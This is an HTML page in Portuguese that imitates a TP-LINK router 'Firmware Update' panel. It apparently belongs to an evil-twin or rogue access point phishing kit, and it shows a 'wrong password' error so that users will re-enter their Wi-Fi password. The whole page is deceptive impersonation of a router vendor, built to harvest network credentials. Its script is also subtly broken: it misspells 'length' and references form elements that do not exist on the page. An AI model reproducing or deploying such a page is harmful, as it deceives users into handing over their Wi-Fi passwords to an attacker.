<!DOCTYPE html>
<html lang=en> <head><title>Página de Configuração Roteador</title><meta charset=utf-8><meta name=viewport content="width=device-width, initial-scale=1"><link rel=stylesheet href=bootstrap.min.css><script src=jquery.min.js></script><script src=bootstrap.min.js></script><!-- CSS --><style type=text/css>

    /* Sticky footer styles
    -------------------------------------------------- */

    html,
    body {
          height: 100%;
          /* The html and body elements cannot have any padding or margin. */
        }

        /* Wrapper for page content to push down footer */
        #wrap {
          min-height: 100%;
          height: auto !important;
          height: 100%;
          /* Negative indent footer by it's height */
          margin: 0 auto -60px;
        }

        /* Set the fixed height of the footer here */
        #push,
        #footer {
          height: 60px;
        }
        #footer {
          background-color: #f5f5f5;
        }

        /* Lastly, apply responsive CSS fixes as necessary */
        @media (max-width: 767px) {
          #footer {
            margin-left: -20px;
            margin-right: -20px;
            padding-left: 20px;
            padding-right: 20px;
          }
        }
  </style></head> <body> <!-- Start navigation bar --> <!-- To change the navigation bar color change background attribute --> <nav class="navbar navbar-inverse" style=background:RoyalBlue;margin-top:2em;> <div class=container-fluid> <div class=navbar-header> <button type=button class=navbar-toggle data-toggle=collapse data-target=#myNavbar> <span class=icon-bar></span> <span class=icon-bar></span> <span class=icon-bar></span> </button> <!--
        <a class="navbar-brand"><img style="background:transparent" src="Your LOGO" alt="Logo"></a>
        --> </div> <div class="collapse navbar-collapse" id=myNavbar> <ul class="nav navbar-nav"> <li class=dropdown data-toggle=modal data-target=#update-only><a class=dropdown-toggle data-toggle=dropdown href=# style=color:white>Configuração <span class=caret></span></a> <ul class=dropdown-menu> <li><a href=#>Básica</a></li> <li><a href=#>DDNS</a></li> <li><a href=#>MAC Address</a></li> <li><a href=#>Roteamento Avançado</a></li> </ul> </li> <li class=dropdown data-toggle=modal data-target=#update-only><a class=dropdown-toggle data-toggle=dropdown href=# style=color:white>Wifi <span class=caret></span></a> <ul class=dropdown-menu> <li><a href=#>Config Wifi Básico</a></li> <li><a href=#>Segurança Wifi</a></li> <li><a href=#>Filtro MAC do Wifi</a></li> <li><a href=#>Avançadas</a></li> </ul> </li> <li class=dropdown data-toggle=modal data-target=#update-only><a class=dropdown-toggle data-toggle=dropdown href=# style=color:white>Segurança <span class=caret></span></a> <ul class=dropdown-menu> <li><a href=#>Firewall</a></li> <li><a href=#>VPN</a></li> </ul> </li> <li class=dropdown data-toggle=modal data-target=#update-only><a class=dropdown-toggle data-toggle=dropdown href=# style=color:white>Restrição de Acesso <span class=caret></span></a> <ul class=dropdown-menu> <li><a href=#>Acesso a Internet</a></li> </ul> </li> <li class=dropdown data-toggle=modal data-target=#update-only><a class=dropdown-toggle data-toggle=dropdown href=# style=color:white>Administração <span class=caret></span></a> <ul class=dropdown-menu> <li><a href=#>Gerenciamento</a></li> <li><a href=#>Histórico</a></li> <li><a href=#>Diagnósticos</a></li> <li><a href=#>Resetar de Fábrica</a></li> <li><a href=#>Config Gerenciamento</a></li> </ul> </li> <li class=dropdown data-toggle=modal data-target=#update-only><a class=dropdown-toggle data-toggle=dropdown href=# style=color:white>Status <span class=caret></span></a> <ul class=dropdown-menu> <li><a href=#>Roteador</a></li> <li><a href=#>Rede Local</a></li> <li><a href=#>Wifi</a></li> <li><a href=#>Roteamento Avançado</a></li> </ul> </li> </ul> </div> </div> </nav> <!-- End navigation bar --> <!-- Start page content --> <div class=container> <div class=col-sm> <h2 class=text-center style=color:RoyalBlue>Atualização de Firmware</h2> </div> <div class="alert alert-danger"> <p>Senha incorreta</p> </div> <div>A senha digitada não confere com a senha Wifi configurada na sua rede. Por favor, <a href=javascript:window.history.back()>retorne</a> e insira a senha correta. <div id=push></div> </div> <!-- Start page content --> <!-- Start footer --> <footer class=footer> <div class="container text-center"> <p class=text-muted>TP-LINK© 2019, Todos os direitos reservados.</p> </div> </footer> <!-- End footer --> <script>

/*
  Check the password field and act accordingly.
*/
$("#btn").on("click", function(e) {

    // get the password box and checkbox elements
  var input = document.getElementById("pwd");
    var box = document.getElementById("check-box");

    // if the box is checked
    if ( box.checked != true ){
          // display no checkbox message
          $("#no-checkbox").modal("show");
    return false;
        }
        if ( input.value.lenght < 7 ||  input.value.lenght > 64){
    // display no password message
    $("#empty-pass").modal("show");
    return false;
    }


});


/*
  Check the status of check box
*/
function checkBoxStatus()
{
  // get the password box and checkbox elements
  var box = document.getElementById("check-box");
  var input = document.getElementById("pwd");

  // if the box is checked
  if ( box.checked == true )
    {
      // enabale the password box
      input.disabled = false;
    }
  else
    {
      // disable the password box
      input.disabled = true;
    }
  }
</script> </body> </html> 